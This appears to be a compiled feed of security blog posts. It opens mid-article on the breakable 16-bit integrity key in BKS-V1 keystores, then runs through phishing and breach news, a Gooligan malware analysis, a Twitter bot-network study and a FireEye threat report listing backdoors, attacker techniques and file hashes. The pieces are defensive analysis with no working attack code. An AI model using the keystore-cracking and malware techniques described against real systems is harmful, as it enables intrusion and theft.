The MD5 hash algorithm, which has a digest size of 128 bits, was shown in 1996 to be unsafe if a collision-resistant hash is required. By 2005, researchers produced a pair of PostScript documents and a pair of X.509 certificates where each pair shared the same MD5 hash. While it takes a bit of CPU processing power to find such collisions, it's feasible to do so with modern computing hardware.
The SHA-1 hash algorithm, which has a digest size of 160 bits, is more resistant to collisions than MD5. However by February 2017, the first known SHA-1 collision was produced. This attack required "the equivalent processing power as 6,500 years of single-CPU computations and 110 years of single-GPU computations."
The SHA-256 hash algorithm, which has a digest size of 256 bits, is even more resistant to collisions than SHA-1. To date, no collisions have been found using the SHA-256 hashing algorithm.
BKS-V1 Files and Accidental Collisions
My naive BKS bruteforcing script produced three different passwords for the same BKS file. Let's look at the code for handling BKS files in pyjks:
hmac_fn = hashlib.sha1
hmac_digest_size = hmac_fn().digest_size
hmac_key_size = hmac_digest_size*8 if version != 1 else hmac_digest_size
hmac_key = rfc7292.derive_key(hmac_fn, rfc7292.PURPOSE_MAC_MATERIAL, store_password, salt, iteration_count, hmac_key_size//8)
Here we can see that the HMAC function is SHA-1, which isn't bad. However, it turns out that it's the HMAC key (and its size) that is important, since that's what determines whether the correct password has been provided to unlock the BKS keystore file. If the file is a BKS version 1 file, the hmac_key_size value will be the same as hmac_digest_size.
In the case of hashlib.sha1, the digest_size is 20 bytes (160 bits). But where it gets interesting is the derivation of hmac_key. The size of hmac_key is determined by hmac_key_size//8 (integer division, dropping any remainder). In this case, it's 20//8, which is 2 bytes (16 bits). Why is there integer division by 8 at all? It's not clear, but perhaps the developer confused where bits are used and bytes are used in the code.
Let's add a debugging print() statement to the bks.py component of pyjks and test our three different passwords for the same BKS keystore:
$ python -c "import jks; keystore = jks.bks.BksKeyStore.load('test.bks', 'Redefinir senha')" hmac_key: c019
$ python -c "import jks; keystore = jks.bks.BksKeyStore.load('test.bks', 'Activity started without extras')" hmac_key: c019
$ python -c "import jks; keystore = jks.bks.BksKeyStore.load('test.bks', 'query.is.any.user.logged.in')" hmac_key: c019
Here we can see that the hmac_key value is c019 (hex) with each of the three different passwords that are provided. In each of the three cases, the BKS-V1 keystore is decrypted, despite the likelihood that not one of the three accepted passwords was the one chosen by the software developer.
Why was I accidentally able to find BKS-V1 password collisions due to my shoddy Python programming skills? The maximum entropy you get from any BKS-V1 password is only 16 bits. This is nowhere near enough bits to represent a password. When it comes to password strength, entropy can be used as a measure. If only bruteforce techniques are used, each case-sensitive Latin alphabet character adds 5.7 bits of entropy. So a randomly-chosen three-character,case-sensitive Latin alphabet password will have 17.1 bits of entropy, which already exceeds the complexity of what you can represent in 16 bits. In other words, while a developer can choose a reasonably-strong password to protect the contents integrity of a BKS-V1 file, the file format itself only supports complexity equivalent to just less than what is provided by a randomly-selected case-sensitive three-letter password.
Cracking BKS-V1 Files
What amount of integrity protection does a 16-bit hmac_key provide? Virtually nothing. 16 bits can only represent 65,536 different values. What this means is regardless of the password complexity the developer has chosen, a bruteforce password cracker needs to try at most 65,536 times. A high-end GPU these days can crunch through over 10 billion SHA-1 operations per second.
As it turns out John the Ripper does have BKS file support, despite what my earlier web searches turned up. While there isn't currently GPU support for cracking BKS files, a CPU is plenty fast enough. My limited testing has shown that any BKS-V1 file can be cracked in about 10 seconds or less using just a single CPU core on a modern system.
Conclusion and Recommendations
Without a doubt, BKS-V1 keystore files are insecure, due to insufficient HMAC key size. Although BKS files support password protection to protect their contents integrity, the protection supplied by version 1 of the file format is nearly zero. For these reasons, here are recommendations for developers who use Bouncy Castle:
- Be sure to use Bouncy Castle version 1.47 or newer. This version, which was introduced on March 30, 2012, increases the default MAC of a BKS key store from 2 bytes to 20 bytes.
This information has been in the release notes for Bouncy Castle for about six years, but it may have been overlooked because no CVE identifier was assigned to this weakness. Approximately 84% of the BKS files seen in Android applications are using the vulnerable version 1. We assigned CVE-2018-5382 to this issue to help ensure that it gets the attention it deserves. - On modern Bouncy Castle versions, do not use the "BKS-V1" format, which was added for legacy compatibility with Bouncy Castle version 1.46 and earlier.
If you have rely on password protection provided by BKS-V1 to protect private key material, these private keys should be considered compromised. Such keys should be regenerated and stored in a keystore that provides adequate protection against brute-force attacks, along with a sufficiently complex and long password. For BKS files that contain only public information, such as certificates, the weak password protection provided by version 1 of the format is not important.
For more details, please see CERT Vulnerability Note VU#306792.
Tax Phishing Scams Are Back: Here Are 3 to Watch Out For
This Year’s Crop of Tax Phishing Scams Target Individuals, Employers, and Tax Preparers
Tax season is stressful enough without having to worry about becoming the victim of a cyber crime. Here are three different tax phishing scams targeting employers, individuals, and even tax preparers that are currently making the rounds.
Employers: W-2 Phishing Emails
The W-2 phishing scams that have plagued employers for a couple of years are back with a vengeance. The IRS noticed a significant uptick in these tax phishing scams beginning in January and recently issued an official warning. Also known as spear phishing or business email compromise (BEC) scams, these campaigns differ from traditional phishing scams in that they are highly targeted. They are sent to specific employees within organizations who have access to employee tax data, usually human resources personnel, and often appear to come from a company executive. Occasionally, the IRS reports, the email will request a wire transfer along with employee W-2 data.
Individuals: Phony “Tax Notification” Emails
While the hackers behind this particular scam are not seeking tax ID data, they are harnessing the stress of tax season and victims’ fear of the IRS to get them to click on phishing links. The targets are Microsoft 365 users, and Dark Reading reports that “tens of millions” may have received the emails. The messages purport to be from the IRS, warn recipients that there is some sort of problem with their taxes and that dire consequences will result if they do not take immediate action, and include attachments with names such as “taxletter.doc.” Downloading and opening the attachment installs password-stealing malware on the victim’s machine.
Tax Preparers and Individuals: New Tax ID Theft Phishing Scheme
These highly sophisticated tax phishing scams are executed in two phases. In the first phase, hackers send traditional or spear phishing emails to tax preparers, which install malware on their computers and allow the hackers to steal client tax and bank account data.
In the second phase, the hackers use the data to file fraudulent tax returns – then have IRS refunds deposited in the victims’ bank accounts. In some cases, the return is filed using one victim’s tax data and the money deposited in another victim’s bank account. The bank account owners are then contacted by someone claiming to be an IRS representative, demanding that they take specific (and irreversible) steps to “return” the money.
Fighting Back Against Tax Phishing Scams
There are several ways to prevent falling victim to these and other tax phishing scams. Organizations should ensure that all employees are trained to identify phishing emails, including spear phishing, have a specific and clear procedure to report suspicious emails, and take all other appropriate proactive cyber security measures. Individuals should also be aware of the warning signs of a phishing email, including text written in broken English and return addresses that appear to be off, such as a government agency with a .com address.
The IRS requests that suspected tax-related phishing emails be forwarded to phishing@irs.gov. If you receive an erroneous refund deposit to your bank account, follow the IRS’s instructions for returning it:
- Contact the Automated Clearing House (ACH) department of the bank/financial institution where the direct deposit was received and have them return the refund to the IRS.
- Call the IRS toll-free at 800-829-1040 (individual) or 800-829-4933 (business) to explain why the direct deposit is being returned.
- Interest may accrue on the erroneous refund.
The cyber security experts at Lazarus Alliance have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting organizations of all sizes from security breaches. Our full-service risk assessment services and Continuum GRC RegTech software will help protect your organization from data breaches, ransomware attacks, and other cyber threats.
Lazarus Alliance is proactive cyber security®. Call 1-888-896-7580 to discuss your organization’s cyber security needs and find out how we can help your organization adhere to cyber security regulations, maintain compliance, and secure your systems.
The post Tax Phishing Scams Are Back: Here Are 3 to Watch Out For appeared first on .
Employees Are Biggest Threat to Healthcare Data Security
Two new reports illustrate the threat of employee carelessness and maliciousness to healthcare data security
Healthcare data security is under attack from the inside. While insider threats – due to employee error, carelessness, or malicious intent – are a problem in every industry, they are a particular pox on healthcare data security. Two recent reports illustrate the gravity of the situation.
Verizon’s 2018 Protected Health Information Data Breach Report, which examined 1,368 healthcare data security incidents in 27 countries (heavily weighted towards the U.S.), found that:
- 58% of protected health information (PHI) security incidents involved internal actors, making healthcare the only industry where internal actors represent the biggest threat to their organizations.
- About half of these incidents were due to error or carelessness; the other half were committed with malicious intent.
- Financial gain was the biggest driver behind intentional misuse of PHI, accounting for 48% of incidents. Unauthorized snooping into the PHI of acquaintances, family members, or celebrities out of curiosity or for “fun” was second (31%).
- Over 80% of the time, insiders who intentionally misused PHI didn’t “hack” anything; they simply used their existing credentials or physical access to hardware (such as access to a laptop containing PHI).
- 21% of PHI security incidents involved lost or stolen laptops containing unencrypted data.
- In addition to PHI breaches, ransomware continues to plague healthcare data security; 70% of incidents involving malicious code were ransomware attacks.
Meanwhile, a separate survey on healthcare data security conducted by Accenture found that nearly one in five healthcare employees would be willing to sell confidential patient data to a third party, and they would do so for as little as $500 to $1,000. Even worse, nearly one-quarter reported knowing “someone in their organization who has sold their credentials or access to an unauthorized outsider.”
Combating Insider Threats to Healthcare Data Security
Healthcare data security is especially tricky because numerous care providers require immediate and unrestricted access to patient information to do their jobs. Any hiccups along the way could result in a dead or maimed patient. However, there are proactive steps healthcare organizations can take to combat insider threats:
- Establish written acceptable use policies clearly outlining who is allowed to access patient health data and when, and the consequences of accessing PHI without a legitimate reason.
- Back up these policies with routine monitoring for unusual or unauthorized user behavior; always know who is accessing patient records.
- Restrict system access as appropriate, and review user access levels on a regular basis.
- Don’t forget to address the physical security of hardware, such as laptops.
The cyber security experts at Continuum GRC have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting your organization from security breaches. Continuum GRC offers full-service and in-house risk assessment and risk management subscriptions, and we help companies all around the world sustain proactive cyber security programs.
Continuum GRC is proactive cyber security®. Call 1-888-896-6207 to discuss your organization’s cyber security needs and find out how we can help your organization protect its systems and ensure compliance.
The post Employees Are Biggest Threat to Healthcare Data Security appeared first on .
Retired 4-Star Army General Calls Trump A ‘Serious Threat To National Security’
Taking down Gooligan: part 2 — inner workings
This post provides an in-depth analysis of the inner workings of Gooligan, the infamous Android OAuth stealing botnet.
This is the second post of a series dedicated to the hunt and takedown of Gooligan that we did at Google, in collaboration with Check Point, in November 2016. The first post recounts Gooligan’s origin story and provides an overview of how it works. The final post discusses Gooligan’s various monetization schemas and its take down. As this post builds on the previous one , I encourage you to read it, if you haven’t done so already.
This series of posts is modeled after the talk I gave at Botconf in December 2017. Here is a re-recording of the talk:
You can also get the slides here but they are pretty bare.
Infection
Initially, users are tricked into installing Gooligan’s staging app on their device under one false pretense or another. Once this app is executed, it will fully compromise the device by performing the five steps outlined in the diagram below:
As emphasized in the chart above, the first four stages are mostly borrowed from Ghost Push . Gooligan authors main addition is the code needed to instrument the Play Store app using a complex injection process. This heavy code reuse initially made it difficult for us to separate Ghost Push samples from Gooligan ones. However, as soon as we had the full kill chain analyzed, we were able to write accurate detection signatures.
Payload decoding
Most Gooligan samples hide their malicious payload in a fake image located in assets/close.png. This file is encrypted with a hardcoded [XOR encryption] function. This encryption is used to escape the signatures that detect the code that Gooligan borrows from previous malware. Encrypting malicious payload is a very old malware trick that has been used by Android malware since at least 2011.
Besides its encryption function, one of the most prominent Gooligan quirks is its weird (and poor) integrity verification algorithm. Basically, the integrity of the close.png file is checked by ensuring that the first ten bytes match the last ten. As illustrated in the diagram above, the oddest part of this schema is that the first five bytes (val 1) are compared with the last five, while bytes six through ten (val 2) are compared with the first five.
Phone rooting
As alluded to earlier, Gooligan, like Snappea and Ghostpush, weaponizes the Kingroot exploit kit to gain root access. Kingroot operates in three stages: First, the malware gathers information about the phone that are sent to the exploit server. Next, the server looks up its database of exploits (which only affect Android 3.x and 4.x) and builds a payload tailored for the device. Finally, upon payload reception, the malware runs the payload to gain root access.
The weaponization of known exploits by cyber-criminals who lack exploit development capacity (or don't want to invest into it) is as old as crimeware itself. For example, DroidDream exploited Exploid and RageAgainstTheCage back in 2011. This pattern is common across every platform. For example, recently NSA-leaked exploit Eternal Blue was weaponized by the fake ransomware NoPetya. If you are interested in ransomware actors, check my posts on the subject.
Persistence setup
Upon rooting the device, Gooligan patches the install-recovery.sh script to ensure that it will survive a factory reset. This resilience mechanism was the most problematic aspect of Gooligan, from a remediation perspective, because for the oldest devices, it only left us with OTA (over the air) update and device re-flashing as a way to remove it. This situation was due to the fact that very old devices don't have verified boot , as it was introduced in Android 4.4.
This difficult context, combined with the urgent need to help our users, led us to resort to a strategy that we rarely use: a coordinated takedown. The goal of this takedown was to disable key elements of the Gooligan infrastructure in a way that would ensure that the malware would be unable to work or update. As discussed in depth at the end of the post, we were able to isolate and take down Gooligan’s core server in less than a week thanks to a wide cross-industry effort. In particular, Kjell from the NorCert worked around the clock with us during the Thanksgiving holidays (thanks for all the help, Kjell!).
Play store app manipulation
The final step of the infection is the injection of a shared library into the Play store app. This shared library allows Gooligan to manipulate the Play store app to download apps and inject review.
We traced the injection code back to publicly shared code . The library itself is very bare: the authors added only the code needed to call Play store functions. All the fraud logic is in the main app, probably because the authors are more familiar with Java than C.
Impacted devices
Geo-distribution
Looking at the set of devices infected during the takedown revealed that most of the affected devices were from India, Latin America, and Asia, as visible in the map above. 19% of the infections were from India, and the top eight countries affected by Gooligan accounted for more than 50% of the infections.
Make
In term of devices, as shown in the barchart above, the infections are spread across all the big brands, with Samsung and Micromax being unsurprisingly the most affected given their market share. Micromax is the leading Indian phone maker, which is not very well known in the U.S. and Europe because it has no presence there. It started manufacturing Android One devices in 2014 and is selling in quite a few countries besides India, most notably Russia.
Attribution
Initial clue
Buried deep inside Gooligan patient zero code, Check Point researchers Andrey Polkovnichenko , Yoav Flint Rosenfeld , and Feixiang He , who worked with us during the escalation, found the very unusual text string oversea_adjust_read_redis. This string led to the discovery of a Chinese blog post discussing load balancer configuration, which in turn led to the full configuration file of Gooligan backend services.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
#Ads API
acl is_ads path_beg /overseaads/
use_backend overseaads if is_ads
…
#Payment API
acl is_paystatis path_beg /overseapay/admin/
use_backend overseapaystatis if is_paystatis
...
# Play install
acl is_appstore path_beg /appstore/
use_backend overseapaystatis if is_appstore
...
Analyzing the exposed HAproxy configuration allowed us to pinpoint where the infrastructure was located and how the backend services were structured. As shown in the annotated configuration snippet above, the backend had API for click fraud, receiving payment from clients, and Play store abuse. While not visible above, there was also a complex admin and statistic-related API.
Infrastructure
Combining the API endpoints and IPs exposed in the HAproxy configuration with our knowledge of Gooligan binary allowed us to reconstruct the infrastructure charted above. Overall, Gooligan was split into two main data centers: one in China and one overseas in the US, which was using Amazon AWS IPs. After the takedown, all the infrastructure ended up moving back to China.
Note: in the above diagram, the Fraud end-point appears twice. This is not a mistake: at Gooligan peak, its authors splited it out to sustain the load and better distribute the requests.
Actor
So, who is behind Gooligan? Based on this infrastructure analysis and other data, we strongly believe that it is a group operating from mainland China. Publicly, the group claims to be a marketing company, while under the hood it is mostly focused on running various fraudulent schema. The apparent authenticity of its front explains why some reputable companies ended up being scammed by this group. Bottom line: be careful who you buy ads or install from: If it is too good to be true...
In the final post of the serie, I discusses Gooligan various monetization schemas and its takedown. See you there!
Thank you for reading this post till the end! If you enjoyed it, don’t forget to share it on your favorite social network so that your friends and colleagues can enjoy it too and learn about Gooligan.
To get notified when my next post is online, follow me on Twitter , Facebook , Google+ , or LinkedIn . You can also get the full posts directly in your inbox by subscribing to the mailing list or via RSS .
A bientôt!
Weekly Cyber Risk Roundup: Russia Sanctions, Mossack Fonseca Shutdown, Equifax Insider Trading
On Thursday, the U.S. government imposed sanctions against five entities and 19 individuals for their role in “destabilizing activities” ranging from interfering in the 2016 U.S. presidential election to carrying out destructive cyber-attacks such as NotPetya, an event that the Treasury department said is the most destructive and costly cyber-attack in history.
“These targeted sanctions are a part of a broader effort to address the ongoing nefarious attacks emanating from Russia,” said Treasury Secretary Steven T. Mnuchin in a press release. “Treasury intends to impose additional CAATSA [Countering America’s Adversaries Through Sanctions Act] sanctions, informed by our intelligence community, to hold Russian government officials and oligarchs accountable for their destabilizing activities by severing their access to the U.S. financial system.”
Nine of the 24 entities and individuals named on Thursday had already received previous sanctions from either President Obama or President Trump for unrelated reasons, The New York Times reported.
In addition to the sanctions, the Department of Homeland Security and the FBI issued a joint alert warning that the Russian government is targeting government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.
According to the alert, Russian government cyber actors targeted small commercial facilities’ networks with a multi-stage intrusion campaign that staged malware, conducted spear phishing attacks, and gained remote access into energy sector networks. The actors then used their access to conduct network reconnaissance, move laterally, and collect information pertaining to Industrial Control Systems.
Other trending cybercrime events from the week include:
- Sensitive data exposed: Researchers discovered a publicly accessible Amazon S3 bucket belonging to the Chicago-based jewelry company MBM Company Inc. that exposed the personal information of more than 1.3 million people. About 3,000 South Carolina recipients of the Palmetto Fellows scholarship had their personal information exposed online for over a year due to a glitch when switching programs. The Dutch Data Protection Authority accidentally leaked the names of some of its employees due to not removing metadata from more than 800 public documents.
- State data breach notifications: ABM Industries is notifying clients of a phishing incident that may have compromised their personal information. Chopra Enterprises is notifying customers that payment cards used on its ecommerce site may have been compromised. Neil D. DiLorenzo CPA is notifying clients of unauthorized access to a system that contained files related to tax returns, and several clients have reported fraudulent activity related to their tax returns. NetCredit is warning a small percentage of customers that an unauthorized party used their credentials to access their accounts.
- Other data breaches: A misconfiguration at Florida Virtual School led to the personal information of 368,000 students as well as thousands of former and current Leon County Schools employees being compromised. Okaloosa County Water and Sewer said that individuals may have had their payment card information stolen due to a breach involving external vendors that process credit and debit card payments. The Nampa School District said that an email account compromise may have compromised the personal information of 3,983 current and past employees. A cyber-attack at the Port of Longview may have exposed the personal information of 370 current and former employees as well as 47 vendors.
- Arrests and legal actions: A Maryland Man was sentenced to 12 years in prison for his role in a multi-million dollar identity theft scheme that claimed fraudulent tax refunds over a seven-year period. The owner of Smokin’ Joe’s BBQ in Missouri has been charged with various counts related to the use of stolen credit cards. Svitzer said that 500 employees are impacted by the discovery of three employee email accounts in finance, payroll, and operations were auto-forwarding emails outside of the company for nearly 11 months without the company’s knowledge.
- Other notable events: Up to 450 people who filed reports with Gwent Police over a two-year period had their data exposed due to security flaws in the online tool, and those people were never notified that their data may have been compromised. A security flaw on a Luxembourg public radio station may have exposed non-public information.
SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of the top trending targets are shown in the chart below.
Cyber Risk Trends From the Past Week
Two of the largest data breaches of recent memory were back in the news this week due to Mossack Fonseca announcing that it is shutting down following the fallout from the Panama Papers breach as well as a former Equifax employee being charged with insider trading related to its massive breach.
Documents stolen from the Panamanian law firm Mossack Fonseca and leaked to the media in April 2016 were at the center of the scandal known as the Panama Papers, which largely revealed how rich individuals around the world were able to evade taxes in various countries.
“The reputational deterioration, the media campaign, the financial circus and the unusual actions by certain Panamanian authorities, have occasioned an irreversible damage that necessitates the obligatory ceasing of public operations at the end of the current month,” Mossack Fonseca wrote in a statement.
While Mossack Fonseca’s data breach appears to have finally led to the organization shutting down, Equifax’s massive breach announcement in September 2017 has since sparked a variety of regulatory questions, as well as criticism of the company’s leadership and allegations of insider trading.
Last week the SEC officially filed a complaint that alleges that Jun Ying, who was next in line to be the company’s global CIO, conducted insider trading by using confidential information entrusted to him by the company to conclude Equifax had suffered a serious breach, and Ying then exercised all of his vested Equifax stock options and sold the shares in the days before the breach was publicly disclosed.
“According to the complaint, by selling before public disclosure of the data breach, Ying avoided more than $117,000 in losses,” the SEC wrote in a press release.
Ying also faces criminal charges from the U.S. Attorney’s Office for the Northern District of Georgia.
Good To Be Back – Paul’s Security Weekly #551
This week, Patrick Laverty of Rapid7 joins us for an interview! Dick Wilkins of Phoenix Technologies joins us for our second feature interview! In the news, we have updates from Flash, Pwn2Own, VMware, and more on this episode of Paul's Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/Episode551
Visit https://www.securityweekly.com/psw for all the latest episodes!
U.S. Blames Russia for Cyber Attacks on Energy Infrastructure
On March 15, 2018, the Trump Administration took the unprecedented step of publicly blaming the Russian government for carrying out cyber attacks on American energy infrastructure. According to a joint Technical Alert issued by the Department of Homeland Security and the FBI, beginning at least as early as March 2016, Russian government cyber actors carried out a “multi-stage intrusion campaign” that sought to penetrate U.S. government entities and a wide range of U.S. critical infrastructure sectors, including “organizations in the energy, nuclear, commercial facilities, water, aviation and critical manufacturing sectors.”
The attacks involved the Russian government gaining remote access to energy sector networks and other intended targets via malware and spear phishing of “staging targets” that had preexisting relationships with the intended targets. Once the hackers gained access to their intended targets, they used that access to conduct network reconnaissance and collect information on Industrial Control Systems and Supervisory Control and Data Acquisition infrastructure, among other attacks. Although Russia’s motive was not clear, “cyber security experts and former U.S. officials say such behavior is generally espionage-oriented with the potential, if needed, for sabotage.” Indeed, the Russian government has also been linked to attacks on the Ukrainian energy grid in 2015-2016 that “caused temporary blackouts for hundreds of thousands of customers and were considered first-of-their-kind assaults.”
The Technical Alert includes recommended detection and prevention guidelines for network administrators to help defend against similar attacks in the future.
Ethical Hacking with Metasploit the Penetration Testing Tool – 75% OFF
[[ This is a content summary only. Visit my website for full links, other content, and more! ]]
Google’s new Gaming Venture: A New Player?
Marketing “Dirty Tinder” On Twitter
About a week ago, a Tweet I was mentioned in received a dozen or so “likes” over a very short time period (about two minutes). I happened to be on my computer at the time, and quickly took a look at the accounts that generated those likes. They all followed a similar pattern. Here’s an example of one of the accounts’ profiles:
All of the accounts I checked contained similar phrases in their description fields. Here’s a list of common phrases I identified:
- Check out
- Check this
- How do you like my site
- How do you like me
- You love it harshly
- Do you like fast
- Do you like it gently
- Come to my site
- Come in
- Come on
- Come to me
- I want you
- You want me
- Your favorite
- Waiting you
- Waiting you at
All of the accounts also contained links to URLs in their description field that pointed to domains such as the following:
- me2url.info
- url4.pro
- click2go.info
- move2.pro
- zen5go.pro
- go9to.pro
It turns out these are all shortened URLs, and the service behind each of them has the exact same landing page:
My colleague, Sean, checked a few of the links and found that they landed on “adult dating” sites. Using a VPN to change the browser’s exit node, he noticed that the landing pages varied slightly by region. In Finland, the links ended up on a site called “Dirty Tinder”.
Checking further, I noticed that some of the accounts either followed, or were being followed by other accounts with similar traits, so I decided to write a script to programmatically “crawl” this network, in order to see how large it is.
The script I wrote was rather simple. It was seeded with the dozen or so accounts that I originally witnessed, and was designed to iterate friends and followers for each user, looking for other accounts displaying similar traits. Whenever a new account was discovered, it was added to the query list, and the process continued. Of course, due to Twitter API rate limit restrictions, the whole crawler loop was throttled so as to not perform more queries than the API allowed for, and hence crawling the network took quite some time.
My script recorded a graph of which accounts were following/followed by which other accounts. After a few hours I checked the output and discovered an interesting pattern:

Graph of follower/following relationships between identified accounts after about a day of running the discovery script.
The discovered accounts seemed to be forming independent “clusters” (through follow/friend relationships). This is not what you’d expect from a normal social interaction graph.
After running for several days the script had queried about 3000 accounts, and discovered a little over 22,000 accounts with similar traits. I stopped it there. Here’s a graph of the resulting network.
Pretty much the same pattern I’d seen after one day of crawling still existed after one week. Just a few of the clusters weren’t “flower” shaped. Here’s a few zooms of the graph.
Since I’d originally noticed several of these accounts liking the same tweet over a short period of time, I decided to check if the accounts in these clusters had anything in common. I started by checking this one:
Oddly enough, there were absolutely no similarities between these accounts. They were all created at very different times and all Tweeted/liked different things at different times. I checked a few other clusters and obtained similar results.
One interesting thing I found was that the accounts were created over a very long time period. Some of the accounts discovered were over eight years old. Here’s a breakdown of the account ages:
As you can see, this group has less new accounts in it than older ones. That big spike in the middle of the chart represents accounts that are about six years old. One reason why there are fewer new accounts in this network is because Twitter’s automation seems to be able to flag behaviors or patterns in fresh accounts and automatically restrict or suspend them. In fact, while my crawler was running, many of the accounts on the graphs above were restricted or suspended.
Here are a few more breakdowns – Tweets published, likes, followers and following.
Here’s a collage of some of the profile pictures found. I modified a python script to generate this – far better than using one of those “free” collage making tools available on the Internets.
So what are these accounts doing? For the most part, it seems they’re simply trying to advertise the “adult dating” sites linked in the account profiles. They do this by liking, retweeting, and following random Twitter accounts at random times, fishing for clicks. I did find one that had been helping to sell stuff:
Individually the accounts probably don’t break any of Twitter’s terms of service. However, all of these accounts are likely controlled by a single entity. This network of accounts seems quite benign, but in theory, it could be quickly repurposed for other tasks including “Twitter marketing” (paid services to pad an account’s followers or engagement), or to amplify specific messages.
If you’re interested, I’ve saved a list of both screen_name and id_str for each discovered account here. You can also find the scraps of code I used while performing this research in that same github repo.
The Wizard of Value – Enterprise Security Weekly #83
This week, Rami Essaid, Founder of Distil Networks joins us for an interview! In the news, we have updates from CyberArk, Tenable, Fortinet, & Rapid7! Our very own Michael Santarcangelo is joined by Matt Alderman on this episode of Enterprise Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/ES_Episode83
Visit https://www.securityweekly.com/esw for all the latest episodes!
Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries
Intrusions Focus on the Engineering and Maritime Sector
Since early 2018, FireEye (including our FireEye as a Service (FaaS), Mandiant Consulting, and iSIGHT Intelligence teams) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities, especially those connected to South China Sea issues. The campaign is linked to a group of suspected Chinese cyber espionage actors we have tracked since 2013, dubbed TEMP.Periscope. The group has also been reported as “Leviathan” by other security firms.
The current campaign is a sharp escalation of detected activity since summer 2017. Like multiple other Chinese cyber espionage actors, TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit. Known targets of this group have been involved in the maritime industry, as well as engineering-focused entities, and include research institutes, academic organizations, and private firms in the United States. FireEye products have robust detection for the malware used in this campaign.
TEMP.Periscope Background
Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities. However, the group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. Identified victims were mostly found in the United States, although organizations in Europe and at least one in Hong Kong have also been affected. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting on “NanHaiShu.”
TTPs and Malware Used
In their recent spike in activity, TEMP.Periscope has leveraged a relatively large library of malware shared with multiple other suspected Chinese groups. These tools include:
- AIRBREAK: a JavaScript-based backdoor also reported as “Orz” that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services.
- BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration.
- PHOTO: a DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.
- HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.
- LUNCHMONEY: an uploader that can exfiltrate files to Dropbox.
- MURKYTOP: a command-line reconnaissance tool. It can be used to execute files as a different user, move, and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.
- China Chopper: a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.
The following are tools that TEMP.Periscope has leveraged in past operations and could use again, though these have not been seen in the current wave of activity:
- Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform, commonly used for pen-testing network environments. The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands.
- BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal. Used by APT17 and other Chinese cyber espionage operators.
Additional identifying TTPs include:
- Spear phishing, including the use of probably compromised email accounts.
- Lure documents using CVE-2017-11882 to drop malware.
- Stolen code signing certificates used to sign malware.
- Use of bitsadmin.exe to download additional tools.
- Use of PowerShell to download additional tools.
- Using C:\Windows\Debug and C:\Perflogs as staging directories.
- Leveraging Hyperhost VPS and Proton VPN exit nodes to access webshells on internet-facing systems.
- Using Windows Management Instrumentation (WMI) for persistence.
- Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence.
- Receiving C2 instructions from user profiles created by the adversary on legitimate websites/forums such as Github and Microsoft's TechNet portal.
Implications
The current wave of identified intrusions is consistent with TEMP.Periscope and likely reflects a concerted effort to target sectors that may yield information that could provide an economic advantage, research and development data, intellectual property, or an edge in commercial negotiations.
As we continue to investigate this activity, we may identify additional data leading to greater analytical confidence linking the operation to TEMP.Periscope or other known threat actors, as well as previously unknown campaigns.
Indicators
File | Hash | Description |
x.js | 3fefa55daeb167931975c22df3eca20a | HOMEFRY, a 64-bit Windows password dumper/cracker |
mt.exe | 40528e368d323db0ac5c3f5e1efe4889 | MURKYTOP, a command-line reconnaissance tool |
com4.js | a68bf5fce22e7f1d6f999b7a580ae477 | AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages |
Historical Indicators
File | Hash | Description |
green.ddd | 3eb6f85ac046a96204096ab65bbd3e7e | AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages |
BGij | 6e843ef4856336fe3ef4ed27a4c792b1 | Beacon, a commercially available backdoor |
msresamn.ttf | a9e7539c1ebe857bae6efceefaa9dd16 | PHOTO, also reported as Derusbi |
1024-aa6a121f98330df2edee6c4391df21ff43a33604 | bd9e4c82bf12c4e7a58221fc52fed705 | BADFLICK, backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration |
U.S. Blames Russia For Cyberattacks On Electricity Grid
U.S. Hits Russia With Sanctions For Election Meddling, Cyber Attacks
Work On It Together – Business Security Weekly #77
This week, Michael and Paul interview Futurist Thornton May, and CSO of Cisco Systems, Inc., Edna Conway! Then the articles of discussion and tracking security innovation! All that and more, on this episode of Business Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/BSWEpisode77
Visit https://www.securityweekly.com/bsw for all the latest episodes!
Radicati 2018 APT Market Quadrant Report
Type
Description
